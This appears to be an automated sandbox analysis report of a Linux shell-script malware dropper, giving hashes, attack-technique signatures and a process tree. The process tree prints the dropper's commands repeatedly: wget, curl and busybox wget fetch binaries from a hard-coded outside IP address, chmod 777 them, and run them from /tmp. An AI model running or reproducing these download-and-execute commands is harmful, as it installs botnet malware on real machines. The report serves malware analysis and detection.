Analysis
-
max time kernel
6s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
21/11/2024, 08:26
Static task
static1
Behavioral task
behavioral1
Sample
c9003c97407a9fa6047dc81cb2f622cc8dad75c7bb742523f2197a627c5b7459.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
c9003c97407a9fa6047dc81cb2f622cc8dad75c7bb742523f2197a627c5b7459.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c9003c97407a9fa6047dc81cb2f622cc8dad75c7bb742523f2197a627c5b7459.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
c9003c97407a9fa6047dc81cb2f622cc8dad75c7bb742523f2197a627c5b7459.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c9003c97407a9fa6047dc81cb2f622cc8dad75c7bb742523f2197a627c5b7459.sh
-
Size
10KB
-
MD5
761e2fa6cb02a9f2286c4b3ab9c366b1
-
SHA1
7863ee6c6bde7cdd84e2ced24347237ff83ae4bf
-
SHA256
c9003c97407a9fa6047dc81cb2f622cc8dad75c7bb742523f2197a627c5b7459
-
SHA512
e89613581513d8fb590f845aaec4a5981010983317877dabfadeb2aaee5f12cb31beabd47fb65f091f8d5dd1f4fd5168ff11f7bd43badf191419f0c7bf77a24a
-
SSDEEP
192:m5ZKXmXaXtGW47WK3BJ377AwjSeZ78Eoz3jOCI7DHSWOwOgOy5NK7dFIeYAw2EMn:antZiRQe/eY5
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1574 chmod 1652 chmod 1538 chmod 1640 chmod 1670 chmod 1610 chmod 1508 chmod 1514 chmod 1556 chmod 1592 chmod 1526 chmod 1550 chmod 1568 chmod 1598 chmod 1646 chmod 1532 chmod 1562 chmod 1628 chmod 1634 chmod 1520 chmod 1586 chmod 1604 chmod 1616 chmod 1664 chmod 1658 chmod 1544 chmod 1580 chmod 1622 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV 1509 sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV /tmp/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ 1515 jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ /tmp/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV 1521 uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV /tmp/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi 1527 FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi /tmp/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz 1533 mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz /tmp/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT 1539 fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT /tmp/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF 1545 ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF /tmp/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V 1551 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V /tmp/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd 1557 gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd /tmp/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo 1563 QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo /tmp/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z 1569 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z /tmp/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG 1575 NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG /tmp/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS 1581 ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS /tmp/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9 1587 Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9 /tmp/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV 1593 sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV /tmp/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ 1599 jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ /tmp/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV 1605 uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV /tmp/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi 1611 FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi /tmp/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz 1617 mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz /tmp/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT 1623 fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT /tmp/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF 1629 ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF /tmp/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z 1635 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z /tmp/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG 1641 NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG /tmp/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS 1647 ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS /tmp/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9 1653 Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9 /tmp/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V 1659 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V /tmp/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd 1665 gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd /tmp/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo 1671 QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF curl File opened for modification /tmp/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd curl File opened for modification /tmp/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS curl File opened for modification /tmp/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz curl File opened for modification /tmp/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF curl File opened for modification /tmp/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo curl File opened for modification /tmp/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z curl File opened for modification /tmp/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG curl File opened for modification /tmp/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi curl File opened for modification /tmp/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z curl File opened for modification /tmp/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V curl File opened for modification /tmp/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9 curl File opened for modification /tmp/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV curl File opened for modification /tmp/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT curl File opened for modification /tmp/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd curl File opened for modification /tmp/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV curl File opened for modification /tmp/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9 curl File opened for modification /tmp/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz curl File opened for modification /tmp/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT curl File opened for modification /tmp/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo curl File opened for modification /tmp/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV curl File opened for modification /tmp/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ curl File opened for modification /tmp/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV curl File opened for modification /tmp/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG curl File opened for modification /tmp/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V curl File opened for modification /tmp/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ curl File opened for modification /tmp/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi curl File opened for modification /tmp/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS curl
Processes
-
/tmp/c9003c97407a9fa6047dc81cb2f622cc8dad75c7bb742523f2197a627c5b7459.sh/tmp/c9003c97407a9fa6047dc81cb2f622cc8dad75c7bb742523f2197a627c5b7459.sh1⤵PID:1500
-
/bin/rm/bin/rm bins.sh2⤵PID:1501
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵PID:1502
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- Writes file to tmp directory
PID:1503
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵PID:1504
-
-
/bin/chmodchmod 777 sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- File and Directory Permissions Modification
PID:1508
-
-
/tmp/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV./sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- Executes dropped EXE
PID:1509
-
-
/bin/rmrm sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵PID:1510
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵PID:1511
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵PID:1513
-
-
/bin/chmodchmod 777 jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ./jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- Executes dropped EXE
PID:1515
-
-
/bin/rmrm jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵PID:1516
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵PID:1519
-
-
/bin/chmodchmod 777 uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV./uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵PID:1522
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵PID:1525
-
-
/bin/chmodchmod 777 FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi./FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵PID:1528
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵PID:1529
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵PID:1531
-
-
/bin/chmodchmod 777 mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz./mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵PID:1534
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵PID:1535
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵PID:1537
-
-
/bin/chmodchmod 777 fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT./fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- Executes dropped EXE
PID:1539
-
-
/bin/rmrm fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵PID:1540
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:1541
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:1543
-
-
/bin/chmodchmod 777 ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF./ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- Executes dropped EXE
PID:1545
-
-
/bin/rmrm ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:1546
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵PID:1547
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵PID:1549
-
-
/bin/chmodchmod 777 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V./2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- Executes dropped EXE
PID:1551
-
-
/bin/rmrm 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵PID:1552
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵PID:1553
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵PID:1555
-
-
/bin/chmodchmod 777 gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd./gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵PID:1558
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵PID:1559
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵PID:1561
-
-
/bin/chmodchmod 777 QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo./QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- Executes dropped EXE
PID:1563
-
-
/bin/rmrm QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵PID:1564
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵PID:1565
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵PID:1567
-
-
/bin/chmodchmod 777 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- File and Directory Permissions Modification
PID:1568
-
-
/tmp/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z./1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- Executes dropped EXE
PID:1569
-
-
/bin/rmrm 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵PID:1570
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵PID:1571
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵PID:1573
-
-
/bin/chmodchmod 777 NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG./NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- Executes dropped EXE
PID:1575
-
-
/bin/rmrm NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵PID:1576
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵PID:1577
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵PID:1579
-
-
/bin/chmodchmod 777 ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- File and Directory Permissions Modification
PID:1580
-
-
/tmp/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS./ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- Executes dropped EXE
PID:1581
-
-
/bin/rmrm ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵PID:1582
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵PID:1583
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵PID:1585
-
-
/bin/chmodchmod 777 Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9./Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- Executes dropped EXE
PID:1587
-
-
/bin/rmrm Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵PID:1588
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵PID:1589
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵PID:1591
-
-
/bin/chmodchmod 777 sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV./sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- Executes dropped EXE
PID:1593
-
-
/bin/rmrm sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵PID:1594
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵PID:1595
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵PID:1597
-
-
/bin/chmodchmod 777 jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- File and Directory Permissions Modification
PID:1598
-
-
/tmp/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ./jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- Executes dropped EXE
PID:1599
-
-
/bin/rmrm jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵PID:1600
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵PID:1601
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵PID:1603
-
-
/bin/chmodchmod 777 uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV./uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵PID:1606
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵PID:1609
-
-
/bin/chmodchmod 777 FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi./FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- Executes dropped EXE
PID:1611
-
-
/bin/rmrm FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵PID:1612
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵PID:1613
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- Writes file to tmp directory
PID:1614
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵PID:1615
-
-
/bin/chmodchmod 777 mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz./mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- Executes dropped EXE
PID:1617
-
-
/bin/rmrm mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵PID:1618
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵PID:1619
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵PID:1621
-
-
/bin/chmodchmod 777 fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT./fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- Executes dropped EXE
PID:1623
-
-
/bin/rmrm fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵PID:1624
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:1625
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- Writes file to tmp directory
PID:1626
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:1627
-
-
/bin/chmodchmod 777 ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- File and Directory Permissions Modification
PID:1628
-
-
/tmp/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF./ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- Executes dropped EXE
PID:1629
-
-
/bin/rmrm ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:1630
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵PID:1631
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵PID:1633
-
-
/bin/chmodchmod 777 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z./1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵PID:1636
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵PID:1637
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- Writes file to tmp directory
PID:1638
-
-
